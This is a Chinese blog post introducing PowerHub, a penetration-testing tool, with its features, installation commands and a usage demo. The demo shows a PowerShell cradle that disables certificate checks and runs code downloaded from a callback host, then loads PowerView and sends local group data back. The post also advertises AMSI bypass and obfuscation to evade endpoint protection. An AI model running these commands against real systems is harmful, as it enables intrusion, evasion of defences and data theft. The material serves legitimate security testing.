关于PowerHub
PowerHub是一款基于Web应用程序的渗透测试数据传输与端点管理工具,该工具可以帮助渗透测试人员传输数据,尤其是那些被端点保护标记的代码。
功能特性
1、无文件;
2、无状态;
3、证书绑定;
4、通过 RC4 加密对字符串进行“混淆”;
5、支持AMSI旁路;
6、支持用于内存中执行 C# 程序的透明别名;
工具要求
PowerShell
Python 3
工具安装
由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好最新版本的Python 3环境。
源码获取
广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
git clone https://github.com/AdrianVollmer/PowerHub.git
PyPI安装(建议)
PowerHub现已托管在了PyPI上,我们可以像安装其他 Python 包一样安装它:
python3 -m pip install powerhub
如需构建二进制Payload,则需要 MinGW GCC 和 Mono C# 编译器。在类似 Debian 的系统上,可以使用下列命令安装它们:
apt-get install mono-mcs gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
安装后,~/.local/bin中将出现两个新的可执行文件:
powerhub power-obfuscate
接下来,运行下列命令即可:
powerhub <CALLBACK HOST> --auth powerhub:<PASSWORD><CALLBACK HOST><PASSWORD>https://<CALLBACK HOST>:8443
工具使用
获取有关本地组的信息并将其传回:
PS C:\Users\avollmer> [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Nxois='bZeVBC4vZfakT5SmCcaFam6IRY6UNLnC';$Plukgmio=New-Object Net.WebClient;IEX $Plukgmio.DownloadString('https://192.168.11.2:8443/') _____ _____ _ _ _ _______ ______ _ _ _ _ ______ |_____] | | | | | |______ |_____/ |_____| | | |_____] | |_____| |__|__| |______ | \_ | | |_____| |_____] 2.0.0 written by Adrian Vollmer, 2018-2024 Run 'Help-PowerHub' for help PS C:\Users\avollmer> Get-HubModule PowerView Name : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1 Type : ps1 N : 205 Loaded : True Alias : PS C:\Users\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json
工具运行演示
许可证协议
本项目的开发与发布遵循MIT开源许可协议。
项目地址
PowerHub:【GitHub传送门】
参考资料
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)